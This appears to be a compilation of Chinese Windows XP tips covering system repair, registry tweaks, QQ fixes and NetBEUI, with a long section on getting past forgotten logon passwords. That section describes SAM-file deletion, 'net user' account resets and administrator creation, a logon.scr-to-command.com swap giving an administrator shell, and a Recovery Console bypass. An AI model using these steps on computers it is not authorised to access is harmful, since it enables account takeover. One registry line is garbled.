    现在进入C盘根目录，删除“\Cmdcons”文件夹、Cmldr文件。右键单击Boot.ini文件，选择“属性”，在打开的窗口中清除“只读”复选框，“确定”退出。再用“记事本”中打开Boot.ini文件，删除故障恢复控制台的条目(一般是“C:\cmdcons\bootsect.dat="Microsoft Windows Recovery Console"/cmdcons”)，保存文件后关闭，最后再恢复Boot.ini文件的只读属性即可。


用XP安装盘修复损坏的系统文件

《一键清理系统垃圾》

用XP安装盘修复损坏的系统文件

  如果你的WindowsXP操作系统的系统文件被病毒或其它原因损坏了，在这里笔者告诉你一个修复系统文件的方法，那就是通过Windows XP的安装盘来修复被损坏了的文件。
    恢复的具体过程如下：
    在Windows XP的安装盘中搜索被破坏的文件，需要注意的是，文件名的最后一个字符用底线“_”代替，例如：如果要搜索“Notepad.exe”则需要用“Notepad.ex_”来进行搜索。
    搜索到了之后，打开命令行模式（在“运行”中输入“cmd”），然后输入：“EXPAND 源文件的完整路径 目标文件的完整路径”。例如：EXPAND D:\SETUP\NOTEPAD.EX_ C:\Windows\NOTEPAD.EXE。有一点需要注意的是，如果路径中有空格的话，那么需要把路径用双引号（英文引号）包括起来。
    找到当然是最好的，但有时我们在Windows XP盘中搜索的时候找不到我们需要的文件。产生这种情况的一个原因是要找的文件是在“CAB”文件中。由于Windows XP把“CAB”当作一个文件夹，所以对于Windows XP系统来说，只需要把“CAB”文件右拖然后复制到相应目录即可。
    如果使用的是其他Windows平台，搜索到包含目标文件名的“CAB”文件。然后打开命令行模式，输入：“EXTRACT /L 目标位置 CAB文件的完整路径”，例如：EXTRACT /L C:\Windows D:\I386\Driver.cab Notepad.exe。同前面一样，如同路径中有空格的话，则需要用双引号把路径包括起来。


用好 Win XP 自带的“克隆”功能

《一键清理系统垃圾》

用好 Win XP 自带的“克隆”功能

    Windows XP 引入了“ASR (Automated System Recovery)”，即自动系统故障恢复功能。ASR 可以保存和还原应用程序、系统状态及系统和启动分区上的重要文件。ASR 取代了 Windows 2000 和 Windows NT 4.0 中所用的“紧急修复盘”。如果硬盘出现故障并丢失了所有配置参数和信息，我们就可以应用 ASR 还原系统分区的所有数据——怎么样，是不是比Ghost还厉害？

    创建备份文件与修复软盘

    步骤1 在Windows XP中单击“开始→所有程序→附件→系统工具命令备份”，然后在打开的“备份工具-[无标题]”对话框中单击“欢迎”选项卡下的“自动系统恢复向导”按钮，进入“自动系统故障恢复准备向导”对话框，再单击“下一步”进入对话框。

    步骤2 根据向导的提示，在“备份媒体或文件名”下面的输入框中，键入生成的影像文件保存路径及名称，如G:Backup.bkf。

    提示：ASR会将启动分区上的绝大部分数据复制到备份文件中，生成的文件大小一般为启动分区现有文件容量的90％左右，因此我们在选择影像文件保存路径时要注意该分区有足够的空闲空间。

    步骤3 单击“下一步”按钮，进入“正在完成自动系统故障恢复准备向导”对话框，单击“完成”按钮，进入“备份进度”对话框，系统开始备份文件。

    步骤4 备份结束后，系统会提示插入一张格式化好的软盘到软驱中，开始制作ASR修复盘。修复盘制作完成后，要注意将此盘设置为写保护状态，并妥善保管

用修复软盘恢复系统

    一旦以后Windows XP出现了问题，我们就可以使用ASR软盘修复系统故障。操作步骤如下。

    步骤1 在BIOS中设置计算机的光驱为第一启动顺序，然后将Windows XP安装盘放到光驱中，直接从光盘引导系统开始Windows XP的安装。如果用户已经将Windows XP安装文件备份到了硬盘上，可以进入纯DOS状态再运行Windows XP的安装程序。

    步骤2 当安装程序进入文本模式（蓝底色的字符模式）提示时，按下F2键，并按照屏幕提示插入ASR恢复软盘。

    步骤3 安装程序此时会启动ASR进程，并加载必要的文件和驱动，然后开始格式化C盘并读取软盘中保存的磁盘配置。

    步骤4 安装程序会从Windows XP安装光盘或安装文件夹中复制文件，安装一个“最小”的Windows XP，然后启动“自动系统故障恢复”向导，此时用户可以指定备份文件的保存路径，系统会自动在这个最小的Windows XP环境里打开“备份工具”，将备份文件导入原有位置。

    步骤5 恢复完毕后，重新启动计算机，你会发现你的Windows XP又恢复原样啦


用五种设置提高Win XP系统运行速度

《一键清理系统垃圾》

用五种设置提高Win XP系统运行速度

    Windows XP的启动会有许多影响速度的功能，尽管微软说已经作过最优化处理，但对我们来说还是有些可定制之处。

    1、关闭系统属性中的特效，这可是简单有效的提速良方。点击开始→控制面板→系统→高级→性能→设置→在视觉效果中，设置为调整为最佳性能→确定即可。这样桌面就会和win2000很相似的，我还是挺喜欢XP的蓝色窗口，所以在“在窗口和按钮上使用视觉样式
”打上勾，这样既能看到漂亮的蓝色界面，又可以加快速度。

    2、修改注册表的run键，取消那几个不常用的东西，比如Windows Messenger。启用注册表管砥鳎嚎肌诵小鶵egedit→找到“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MSMSGS”/BACKGROUND这个键值，右键→删除，世界清静多了，顺便把那几个什么cfmon的都干掉吧。

    3、修改注册表来减少预读取，减少进度条等待时间，效果是进度条跑一圈就进入登录画面了，开始→运行→regedit启动注册表编辑器，找HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters，有一个键EnablePrefetcher把它的数值改为“1”就可以了。另外不常更换硬件的朋友可以在系统属性中把总线设备上面的设备类型设置为none(无)。

    4、快速浏览局域网络的共享，通常情况下，Windows XP在连接其它计算机时，会全面检查对方机子上所有预定的任务，这个检查会让你等上30秒钟或更多时间。去掉的方法是开始→运行→Regedit→在注册表中找到HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Explorer\RemoteComputer\NameSpace。在此键值下，会有个{D6277990-4C6A-11CF-8D87-00AA0060F5BF}键，把它删掉后，重新启动计算机，Windows XP就不再检查预定任务了，速度明显提高了！

    5、关掉调试器Dr. Watson，可以这样取消：打开册表，找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug子键分支，双击在它下面的Auto键值名称，将其“数值数据”改为0，最后按F5刷新使设置生效，这样就取消它的运行了。沿用这个思路，我们可以把所有具备调试功能的选项取消，比如蓝屏时出现的memory.dmp，在“我的电脑→属性→高级→设置→写入调试信息→选择无”等等。


在Win XP中让QQ跑得更快

《一键清理系统垃圾》

在Win XP中让QQ跑得更快

2002-03-05　　　　作者：沉睡者

    在不少论坛和报刊的问答版里，都看到有些朋友提到自己的QQ在XP里反应很慢的现象，XP和QQ都是好东西，要舍弃其中一个的确比较苦恼。下面笔者就分析一下这种情况，给您对症下药：

    一、版本问题

    在早期的XP版本与QQ的2000b Build 0710前的版本之间，的确存在着冲突，有很慢的现象。但QQ2000b Build 0710开始，腾讯改进了这个缺陷，基本上不再有这个问题，建议你下载最新版本的QQ。如果依然发现此故障，可以尝试在网络设置中改一下端口及使用的服务器（QQ登录时往往选择随机的服务器使用，由于一些服务器的地区性可能会出现比较慢的问题），如果还不行的话，可能是你所安装的XP是测试版之类的非正式版本造成的。

    最近QQ新近推出了1220版，新版可以说无论在功能还是实用性上都做了较大的改动，尤其是登录速度（比如好友列表引导）都有了不小的改观。

    点击这里下载最新的1220版

    二、QQ损坏了

    QQ因为有大量的用户使用，是广告商眼红的黄金宝地，消息广告满天飞。很多人为了过滤广告、显示好友IP地址，加载了不少补丁和伴侣工具。这些工具多多少少都会对QQ的主执行文件或配置文件作出修改，在修改以后，有可能会不适应你的操作系统环境，造成使用的异常。

    另外，因为很多人觉得腾讯附带的浏览器很麻烦，又同时使用了数个QQ号，也想了各种各样的办法来折衷。有时因为号码的混乱，加上XP有“分组相似任务栏”的功能，把同类的程序放在一个组内显示，有人同时用一个号码打开了两三个QQ进程自己也不知道。这样，QQ在启动时写入的配置文件就混乱了，造成QQ记录了错误的配置信息，以后下次再启动读取信息就会变得很慢。
参考的解决办法：其实QQ是一个绿色软件，即不需向windows目录拷贝文件就能运行的程序。只要你把QQ拷贝一份，然后选卸载QQ，腾讯的浏览器就不会再变成默认的浏览器让你烦恼了。你加载补丁前也最好备份一个，发现加载补丁后异常或是突然变慢的，就先导出原来的聊天记录，然后用备份覆盖损坏的版本即可。

    三、腾讯服务器问题

    有时，QQ和XP本身都没问题，而只是腾讯对应你地区的服务器过忙，或停止了响应。这种情况可能在一个小时、两个小时那样长的时间段内都恢复不过来，所以就显得很慢，严重的可能根本收发不了信息。

    解决的办法：是服务器问题，你无能为力，只能另找时间了。

    四、信息和号码过多造成的

    如果你的QQ安装使用了很久，加上好友较多，积累信息和号码过多也会造成QQ的启动变慢。你可以打开资源管理器，找到QQ所在目录，里面有一个dat文件夹，打开后可以看到一个oicq2000．cfg文件，删除这个文件。同时删除QQ目录下面不再需要号码的文件夹。连接上网，启动QQ，会出现注册向导，依次输入属于自己的OICQ号码，进行注册，完成以后你就发现里面除了自己的号码外，再也没有其他号码了。

    这种方法简单易行，任何人都可以操作，唯一的缺点就是要重新读取好友名单，会读出你在老版本QQ上面删除的用户。你还可以将自己修改后的oicq2000．cfg保存一份，以后只需覆盖就可。


在Windows XP中制作屏保

《一键清理系统垃圾》

在Windows XP中制作屏保

2002-02-19　　　　 作者：jinqq

    在Windows XP中增加了许多个性化设置，就说它的屏保吧，也不再像Win9x那样死板，利用Windows XP的屏保程序我们可以自己制作个性化的屏保，不信请跟我来。

    1、确保在您的计算机的一个文件夹中有两张或更多的图片。您可以从数码相机或扫描仪上传图片，或者从Internet上下载自己喜欢的图片。把欲作为屏保的图片保存在同一个文件夹中，比如将它们存放在“我的文档”中的“图片收藏夹”文件夹中。

    2、在桌面上点击鼠标右键，在弹出的快捷菜单中选择“属性”，打开“显示”属性对话框，然后选择“屏幕保护程序”标签，在“屏幕保护程序”下拉框中选择“图片收藏幻灯片”，点击“设置”按钮，进入“图片收藏屏幕保护程序选项”对话框。

    3、在“图片收藏屏幕保护程序选项”中，点击“浏览”按钮，找到“我的文档”中的“图片收藏夹”文件夹，点击“确定”按钮。

    4、接下来我们开始设置显示效果，拖动“更换图片的频率”下的滑块以设置屏幕上转换图片的快慢，可选择的时间范围在6～180秒之间；拖动“图片的尺寸”下的滑块，可以设置图片占用屏幕空间的百分比，最小为25%，最大为全屏；选中“拉伸尺寸小的图片”复选框，则可以使得较小的图片占用更多的屏幕空间，但有时会出现图片失真现象；选中“显示文件名”复选框，则在图片的左上角同时标明文件的路径和名称；选中“图片间使用过渡效果”复选框，则在更换图片时使用动画效果或稍有停顿；选中“允许使用键盘滚动图片”复选框，则屏幕保护处于启动状态时，可以使用方向键“←”、“→”或“↓”来快速查看图片，而不撤消屏幕保护状态。

    5、设置好之后，点击“确定”按钮，退出设置窗口。你可以马上点击“预览”按钮察看一下效果。怎么样，还比较满意吧？


在WinXP下搜索隐藏文件的两种方法

《一键清理系统垃圾》

在WinXP下搜索隐藏文件的两种方法

  为了安全起见，在默认情况下Windows XP是不搜索隐藏文件和文件夹的(即使设置了“显示所有文件和文件夹”也不行)，但是我们可以通过以下两种方法达到目的。

    1.直接设置

    首先打开“资源管理器”，点击工具栏上的“搜索”按钮，在左边的“搜索助理”栏
中点击“改变首选项”，系统会问你：“你想怎样使用搜索助理？”，点击中间的“改变文件和文件夹搜索行为”，然后选择“默认的文件和文件夹搜索行为”为“高级”确定即可看到“更多高级选项”这一项，点击后会弹出很多高级选项，好了，还犹豫什么，赶快勾选“搜索隐藏的文件和文件夹”吧，如果还需要其他的选项(如“区分大小写”)也可以一并选中。

    2.修改注册表法

    如果你觉得上面的设置过于麻烦，也可以通过修改注册表的办法来达到。打开“注册表编辑器”并定位到“HKEY_CURRENT_USER＼Software＼Microsoft＼Windows＼CurrentVersion＼Explorer”分支，在右边的窗口中找到DWORD值“SearchHidden”并将其值设为“1”即可。


在XP上安装NetBEUI

《一键清理系统垃圾》

在XP上安装NetBEUI

Microsoft 在 Windows XP 中不再对 NetBIOS 扩展用户接口 (NetBEUI) 网络协议提供支持。 然而，可以理解，迁移到另一个网络协议（如 TCP/IP）要在规划和测试上花费大量时间。 因此，对于那些打算通过获取完整的、零售版本的 Windows XP 将系统环境迁移到 Windows XP 的用户来说，可在 Windows XP 光盘中的 VALUEADD 目录下找到 NetBEUI 协议。
本文介绍了在运行 Windows XP 的计算机上手动安装不受支持的 NetBEUI 协议的过程。 需要先从 Windows XP 光盘手动复制 NetBEUI 文件，然后 NetBEUI 才会显示在可安装的网络协议列表中。
在 Windows XP 上安装 NetBEUI
在 Windows XP 上安装 NetBEUI 协议所必需的文件是 Netnbf.inf 和 Nbf.sys。若要安装 NetBEUI，请完成以下步骤：
1.将 Windows XP 光盘插到 CD-ROM 驱动器中，浏览到 Valueadd\MSFT\Net\NetBEUI 文件夹。

2.将 Nbf.sys 复制到 %SYSTEMROOT%\System32\Drivers 目录中。

3.将 Netnbf.inf 复制到 %SYSTEMROOT%\Inf 隐藏目录中。

4.单击开始，单击“控制面板”，然后双击“网络连接”。

5.右键单击要为其添加 NetBEUI 的适配器，然后单击属性。

6.在常规选项卡上，单击安装。

7.单击协议，然后单击添加。

8.从列表中单击选中“NetBEUI Protocol”（NetBEUI 协议），然后单击确定。

9.如果收到完成安装的提示，请重新启动计算机。

NetBEUI 协议现在应已安装并正常工作。


找回WinXP 遗忘密码全功略

《一键清理系统垃圾》

找回WinXP 遗忘密码全功略

1.创建修复用户密码的启动软盘
在没有忘记登录密码前可行。
开始>>>控制面板>>>用户账户>>>选择自己的ID>>>左边：阻止一个已忘记的密码>>>下一步>>>插入空白软盘>>>输入密码
密码启动盘做好以后，如果需要密码了，登录界面上，点自己账户右边的箭头，在弹出的提示栏里“使用密码重设磁盘”，插入密码启动盘就OK了
2.NET命令重建XP登录密码
如用户名为ABCD，重启XP，按F8进入“带命令行的安全模式”，进入Administrator账户，在命令行模式下键入“net user ABCD 1234/add”，这样ABCD用户的密码被强制改为1234了。
若想添加新用户，可“net user 12345 67890/add”，然后“net localgroup administrators 12345/add”，这样就建立了一个用户名“12345”，口令“67890”的administrator组用户。重启后就可以它登录了。
以上方法仅仅适用于FAT32分区且用户账户不是中文
3.双系统下删除密码文件
用另外的系统启动，删除C:\windows\system32\config目录下的SAM文件（假设XP在C盘）。重启后Administrator账户就没有密码了。
如果只有一个XP系统，那么只好摘下硬盘，到别人的机子上去删除它。当然，如果是FAT分区，可以用DOS盘启动，然后删除之。
不过，以上方法据说会造成系统不停重启，根本无法进入，我没有试验过。
4.使用NTFSDOS工具
用该工具制作一张可读NT分区的dos启动盘。启动后切换到系统目录，如C:\windows\system32，将logon.scr改为logon.scr.bak，再复制一个command.com并将其更名为logon.scr，然后重启机器后等待15分钟，本该出现的屏幕保护变成了命令行模式，而且是有Administrator权限的，这样就可以修改密码和做一切其它坏事啦。
进入XP后再把logon.scr.bak屏幕保护程序的名字改回去即可。
适用于NT分区的XP
5.使用其它工具重建密码
Linux boot disks启动盘可以访问NTFS文件系统，并且可以读取注册表并重写账户密码；使用NTAcess工具可以绕过syskey的保护和重设登录密码；还有passware Kit、O&O Bluecon 2000

忘记Win XP登录密码怎么办？

    如果你安装的是Windows XP操作系统，不慎忘记了系统登录用户“*****”的密码，你可以NET命令来解决问题：

    Windows XP中提供了“net user”命令，该命令可以添加、修改用户账户信息，其语法格式为：

    net user [UserName [Password | *] [options]] [/domain]

    net user [UserName {Password | *} /add [options] [/domain]

    net user [UserName [/delete] [/domain]]

    我们现在以恢复本地用户“*****”口令为例，来说明解决忘记登录密码的步骤：

    1、重新启动计算机，在启动画面出现后马上按下F8键，选择“带命令行的安全模式”。

    2、运行过程结束时，系统列出了系统超级用户“administrator”和本地用户“*****”的选择菜单，鼠标单击“administrator”，进入命令行模式。

    3、键入命令：“net user ***** 123456 /add”，强制将“*****”用户的口令更改为“123456”。若想在此添加一新用户（如：用户名为abcdef，口令为123456）的话，请键入“net user abcdef 123456 /add”，添加后可用“net localgroup administrators abcdef /add”命令将用户提升为系统管理组“administrators”的用户，并使其具有超级权限。

    4、重新启动计算机，选择正常模式下运行，就可以用更改后的口令“123456”登录“*****”用户了。

Windows XP登录口令丢失的应急办法

    一位朋友打电话来说他的xp无法登陆了。机器是我安装的而且administrators密码我记得，系统FAT32分区，而且在安装时也没有做相应的应急盘，实在不愿再一次面对那安装过程，于是笔者对Windows XP的内部命令进行了分析试验，成功地运用NET命令解决了此问题，现将方法公布出来，与同行共商。

    Windows XP中NET命令的语法为：

      Net [accounts|computer|config|continue|file|group|help|helpmsg|
Localgroup|name|pause|print|send|session|share|start|statics|
            Stop|time|use|user|view]

    其中net user命令为添加或修改用户帐户或者显示用户帐户信息，也是该方法要使用的重要命令，语法格式为：
      net user [UserName [Password | *] [options]] [/domain]
      net user [UserName {Password | *} /add [options] [/domain]]
      net user [UserName [/delete] [/domain]]

    具体每个参数的含义可查看Windows XP帮助信息。好了，我们现在进入正题，以恢复本地用户"OWNER"口令为例，解决登录口令忘记的方法为：

    1、重新启动Windows XP，在启动画面出现后的瞬间，按F8，选择"带命令行的安全模式"运行。

    2、运行过程停止时，系统列出了超级用户administrator和本地用户owner的选择菜单，鼠标点击administrator，进入命令行模式。

    3、键入命令："net user owner 123456 /add"，强制性将OWNER用户的口令更改为"123456"。若想在此添加某一用户（如：用户名为abcdef，口令为123456）的话,请键入"net user abcdef 123456 /add",添加后可用"net localgroup administrators abcdef /add"命令将用户提升为系统管理组administrators用户,具有超级权限。

    4、重新启动Windows XP，选择正常模式运行，就可以用更改的口令"123456" 登录OWNER用户了。

    此方法仅为登录口令忘记后的一种应急措施，当然其它的方法与工具软件也有很多，笔者在此抛砖引玉，不当之处请同行斧正。

怎样不用密码进入Windows XP

    前不久，网络上出现一条新闻，说国外的Windows专家发现，使用Win 2000安装光盘启动电脑可以不要Windows XP管理员密码即进人Windows XP的故障恢复控制台模式。

    这是真的吗？笔者做了一番测试。

    笔者使用的Wndows XP版本是Windows XP Proessional，使用的 Windows 2000版本是集成SP3的Windows Proessional简体中文版。笔者先在C盘（FAT322文件系统）上安装了Windows XP Proessional，安装的时候设置了Administraor账户密码。为了确认Administrator密码已经设置成功，笔者切换为经典的Windows登录方式，然后使用Adndnistrato账户登录。可以看到，登录的时候已经需要密码了，Administrator账户的密码设置是没有问题的了。

    笔者重新启动了电脑，使用Windows 2000 Poessional安装光盘引导，在Wndows2000安装选择界面选择修复Windows 2000（按R键）；，然后选择使用故障控制台修复（按C键），系统会扫描现有的Window2000／XP版本。由于笔者只有一个操作系统，所以只列出了一个登录选择（l：C：＼Windows）。从键盘上按l，然后回车，这个时候，果然如国外所传，Window XP并没有要求输人管理员密码，而是直接登录进入了故障恢复控制台模式（如果使用的是Windows XP安装光盘启动的，那是要求输人管理员密码的。这里指的管理员是指系统内建的Administraor账户）（如图）。熟悉Windows的朋友都知道，故障恢复控制台里面可以进行任何系统级别的操作，例如：复制、移动、删除文件，启动、停止服务，甚至格式化、重新分区等破坏性操作。

    接着，笔者为Windows XP 安装了SPI补丁，再次使用 WindowS 2000安装光盘引导，重复上面的操作，发现结果一样，还是没有任何密码输人要求、由于先前使用的是FAT32文件系统．笔者猜想是不是由于FAT3Z的文件系统造成的这种情况。于是使用Wndows XP里面的Convert命令将FAT3Z文件系统转换成NTFS文件系统，然后再次使用Windows 2000安装光盘引导，重复上面的操作，发现结果一样，还是没有任何密码输人要求。看来这个漏洞是真的存在的。

    需要注意的是，由于各种原因，市面上的一些Windows 2000安装光盘不能够显现故障控制台登录选项，所以也无法利用这个漏洞。同时，由于故障控制台模式本身的限制，也无法从网络上利用这个漏洞，换句
话说，这个漏洞仅限于单机，所以危害性不是非常大。

    笔者又使用集成了SP3的Wndows 2000 Server英文正式版光盘启动，发现漏洞依然存在、看来不单是中文版有这个问题的存在，英文版也同样存在这个问题。

    注：由于笔者还有一个Windows 98，无法将C盘转换为NTFS文件系统。所以基于NTFS文件系统的测试是在VMware虚拟机里面测试的。

巧妙破解Windows XP登陆口令

    Windows XP强大而友好的系统界面博得了越来越多用户的青睐，然而它对用户安全性的审核即是非常严格的，要是你忘记了设置的口令（密码），可别以为能够像Windows98那样选择“取消”同样可以进入系统－－这一点相信安装Windows XP的你，是很清楚的。当然这也是有过痛苦的经历后，才被我们重视的。

    由于没有登陆口令，无法进入系统；起初的方法总是选择重新安装Windows XP，但这种方法但繁琐，而且费时费力，经过多次实验之后，终于找到了一个可以不需要任何其它软件，就可破解Windows XP登录口令的方法：

    但是破解登陆口令，需要有两个必要的前提：

    1.安装Windows XP的分区必须采用FAT32文件系统；

    2.用户名中没有汉字。

    在确认满足这两个条件后，即可执行以下步骤，来破解登陆口令。

    1.开机启动Win XP，当运行到“正在启动Windows XP”的提示界面时，按“F8”键调出系统启动选择菜单，选择“带命令行安全模式”；

    2.当运行停止后，会列出“Administrator”和其它用户的选择菜单(本例的其他用户以xpuser01为例)，选择“Administrator”后回车，进入命令行模式；

    3.键入命令““net user xpuser01 1234/ADD”这是更改该用户密码的命令，命令中的“1234”是更改后的新密码，如果键入的用户不存在（xpuser01），那么系统会自动添加这个用户。

    4.另外还可以使用“net 1oca1group administrator xpuser01 /ADD”命令把xpuser01这个用户升为超级用户，即可拥有所有权限。

    5.最后一步，就是重新启动计算机，在登录窗口中输入刚刚更改的新密码便可成功登陆。

    如果你正在为丢失了登陆口令而烦恼的话，不妨试一试此方法。

制作可恢复Win XP账户密码的启动盘

    如果你是一个很容易遗忘的人，那么一定不要忘记事先创建一张可以恢复Windows XP中的账户密码的启动盘，它可以让你免去格式化硬盘的烦恼。
    从“控制面板”中找到“用户账户”项，选中自己的账户进入如图所示的控制界面，我们可以看到左侧任务列表中有一项“阻止一个已忘记的密码”，点击后便可打开“忘记密码向导”，向导会提示插入一张格式化过的空白磁盘，操作过程中会让你输入该账户所使用的密码，很快便可以创建一张密码重设盘。

    以后，当我们忘记了账户密码的时候，只要点击账户旁边向右的箭头，然后在弹出的提示框中点击“使用密码重设磁盘”，就可以用这张密码重设盘更改密码并启动系统。不过，你可要将这张密码重设盘放在安全之处，否则每一个人都可以利用它来修改密码。（江苏 王志军）

用密码重设盘找回丢失的XP密码

  我们在使用电脑时，为了保护自己的隐私或出于其它安全上的考虑，常常在建立用户帐户时，加有密码，特别是在许多人共同享有一台电脑时， 不同的用户将采用自己的密码登录到Windows XP操作系统。但是，由于工作繁忙或其它什么原因，当我们忘记了自己的密码时，虽说可以找到管理员来修改用户的密码，但有这样做是很麻烦的，那么当我们忘记了密码而工作又不允许停下来的时候怎么办呢。如果微机是公用的，唯一行之有效的办法是，用户能将自己的密码信息备份起来，一旦拥有，登录到自己的桌面，处理自己的事务就易如反掌，不会再因忘记密码而犯愁。本文介绍的方法，就是如何将用户自己的密码作备份，又如何将所备份的密码恢复过来，重新登录到Windows XP。当我们备份了自己的密码后，如果再忘记就没什么可怕的了，就能及时正确地登录，恢复我们的工作。这种方法是通过使用Windows XP自带的工具“密码重设”——“忘记密码向导”和“密码重设向导”来完成的，下面就来介绍这个工具的具体使用方法。

    一、创建密码重设盘

    创建密码重设盘的目的，是为了在用户忘记密码的情况下，能够安全快捷地以新的密码恢复工作。建议每个本地用户都制作一张密码重设盘，并将它保存在安全地方，这样当忘记了自己的密码时，就可使用密码重设盘来重新设定登录密码，从而使用户能继续访问此用户帐户，处理正常的工作事务。创建密码重设盘的方法：使用Windows XP的“忘记密码向导”，具体如下。

    正常启动并登录到Windows XP后，同时按下“Ctrl + Alt + Del”，出现如图1所示“Windows 安全”窗口，点击选项中[更改密码(C)...]按钮，出现图2所示的更改密码窗口。这个窗口中，含有当前用户名、用户在网络或本地的位置、旧密码（用户原登录密码）、新密码以及对新密码的确认信息。其中，用户名为当前已经成功登录的用户名，用户在此有两个选择，要么更改密码，要么将当前用户的密码备份。点击左下角[备份(B)...]按钮，激活“忘记密码向导”，参见图3所示。

图1 Windows 安全”选项卡

图2所示的更改密码对话框

图3 忘记密码向导

  图3所示窗口中，包含了“忘记密码向导”所要做的工作、目的等信息。点击[下一步]出现忘记密码向导的第二步——创建密码重设盘，参见图4。

图4 创建密码重设盘

    这里，你可以选择软盘驱动器（软盘），或移动型外部存储媒体，来保存本用户帐户的密码信息。我们选择“3.5 软盘(A:)”，点击[下一步]，出现如图5所示忘记密码向导的第三步——当前用户帐户密码，此时请输入当前用户账户的密码，只有正确输入密码后，向导才可以继续创建工作，否则弹出信息窗口“您输入的密码对此账户是不正确的，请再输入一次。”。当正确地填入了当前用户的密码后，点击[下一步]。

    在第一次使用忘记密码向导时，点击[下一步]后，系统将自动地向外部存储媒体写入用户的密码数据，如果您已经使用过一次“忘记密码向导”或已经创建了密码重设盘，那么就没有必要再进行第二次或更多次的写入，因为有了一张密码重设盘，可以被本用户帐户长期使用，如果您还想再建一次，那么请点击“是”，系统自动检测存储媒体中是否已经含有本用户的密码信息，如果有，还将报出确认信息：“此用户已经有一个重设盘，创建新的将使旧的不可用，您想继续吗？”点击[是(Y)]。

  如果我们是第一次建立密码重设盘，在输入正确的密码后，点击[下一步]，出现图6所示的“正在创建密码重置磁盘”的窗口，窗口中有一个进度指示，报出完成情况。当为100%时，点击[下一步]，弹出“正在完成密码重设向导”窗口，参见图7所示，点击[完成]，关闭忘记密码向导。

图6 正在创建密码重置此盘

图7 完成密码重设向导
    如果不是第一次使用“忘记密码向导”，在点击[下一步]后，将有提示信息：“此用户已经有一个密码重设盘，创建新的将使旧的不可用，是否继续？”，当点击[是(Y)]按钮后，又弹出以下信息：“磁盘已有密码重置信息，您想替代现有的密码信息吗？”，回答[是(Y)]，将覆盖上一次所创建的该用户密码重设信息。

    当用户使用本文第二步“密码的恢复”介绍方法，用密码重设盘重新设定密码后，没有特殊原因，请按上述方法重新运行一次，创建新的密码重设盘，以备“后患”。

    二、密码的恢复

    当用户忘记了密码，而无法登录Windows XP时，可以使用刚才创建的“密码重设盘”来重新设定登录密码，从而使我们能继续访问此用户帐户，进入用户个人的桌面和设置。一旦进入个人用户帐户，就可以重新更改或修改密码。当忘记了密码后，可采用Windows XP的“密码重设向导”来更改密码，重新登录，从而保障我们的工作不受影响。

  Windows XP的“密码重设向导”，是在Windows XP的登录窗口出现后才能启动。图8是Windows XP的登录窗口，其中[用户名(U)]为用户帐户的名称，当用户输入了错误的密码后，就会弹出图9所示的“登陆失败”窗口，说明您的密码有问题，系统不能让你登录到Windows XP，如果您的确想不起来自己的密码是什么时，可点击[重设(R)...]按钮，启动密码重设向导，通过刚才所创建的密码重设盘，重新设定密码，登录Windows XP。

图8 登录到 Windows

图9 登录失败
    点击图9中的[重设(R)...]按钮，出现如图10所示的“密码重设向导”窗口，刚才已经说过，要使用“密码重设向导”来重新设定密码，这之前必须创建了密码重设盘——通过忘记密码向导创建。

图10 欢迎使用密码重设向导
    点击[下一步]，密码重设向导提示用户插入所创建的“密码重设盘”，如图11。向导将通过密码重设盘，来读取用户资料，并与当前登录用户资料进行比较，如果一致，将打开图12所示的“重设用户帐户密码”窗口。

图11 插入密码重设盘

图12 重设用户帐户密码
    这是“密码重设向导” 的关键一步，它允许用户输入一个新的密码，并予以确认，如有必要可输入一个密码提示，用以增强用户的保密性质。但应当注意，当用户输入了一个新的密码后，原来的密码不管是什么，都已经作废（不包括“密码重设盘”中的密码信息），但是“密码重设盘”中的密码对本用户帐户来说却一直有效，不管用户现在输入的密码是什么。输入新的密码后，稍等一会儿，点击[下一步]，系统将完成密码重设工作，并结束密码重设向导，见图13所示。向导告诉我们，当今后用户又将刚才所更改的密码忘记时，还可以重新使用这张密码重设盘，而没有必要更新“密码重设盘”，或者说所创建的“密码重设盘”可以长期使用，除非用户帐户本身的更改，不再需要重新创建密码重设盘。当然，如果用户使用了刚刚设定的新的密码后，想创建一张新的“密码重设盘”完全可以，但是当创建了新的密码重设盘后，原来的密码重设盘将不能再使用，而且应当将新创建的密码重设盘保存好，以备今后忘记密码时使用。

    “密码重设盘”的创建，含有一定的危险性，因为任何人都可以使用这一张“密码重设盘”来登录Windows XP，都可以以该用户的名义进入用户帐户，操作真正用户所能操作的一切，所以必须将“密码重设盘”保存在适当的地方，以防丢失或失泄密。

图13 完成密码重设向导

    当用户使用“密码重设盘”更改了密码后，又回到Windows XP的登录窗口（图8），用户就可以使用新的密码登录，从而实现密码的重新设定。如果当前的Windows XP操作系统有很多个用户，每个用户必须单独创建自己的“密码重设盘”。

    “密码重设向导”和“忘记密码向导”，同样也适用于网络管理，如果计算机管理员忘记了工作组中某台计算机或独立计算机上的密码，使用密码重设盘，则可以使用它为帐户创建新的密码，恢复用户计算机的设置。当然，出于安全的考虑，如果用户忘记了密码，有时，计算机管理员也无法恢复，但是，计算机管理员能为您创建一个新的密码。注意：使用计算机管理员帐户的用户可以创建或更改计算机上所有用户的密码。拥有受限帐户的用户可以创建和更改自己的密码，以及创建自己的密码提示。

    最后让我们来看一看“密码重设盘”（软盘）中到底有什么样的文件吧。打开资源管理器，双击“3.5 软盘(A:)”，发现，仅仅有一个文件“userkey.psw”，只有2k字节大小，这就是“密码重设盘”的所有内容。


指定Win XP中启动项目的顺序

《一键清理系统垃圾》

指定Win XP中启动项目的顺序

在有些情况下你需要指定自启动项目的顺序，比如在自启动某些项目前，需要先启动网络连接程序。那有没有方法可以指定自启动项目的顺序呢？

下面我就介绍指定自启动项目顺序的方法。

1. 新建一个文件夹，例如：C:\Ordered Launch，然后把“开始|所有程序|启动”文件夹下的所有快捷方式都剪切到这个文件夹下，然后把你希望自启动的项目的快捷方式也放到这个文件夹里面。

2. 在“运行”里面输入“Cmd”，打开控制台模式，然后把当前目录切换到“C:\Ordered Launch”。切换好目录之后，输入命令“DIR /B /S > ordered.bat” 。然后在输入命令“notepad ordered.bat”，打开这个刚刚建立的批处理文件，你可以在打开的记事本中，把自启动项目安排成你希望顺序。需要注意的是，每个项目都需要用引号括起来，而且用“start”开始，例如：start "C: \Ordered Launch\First Program.lnk"。

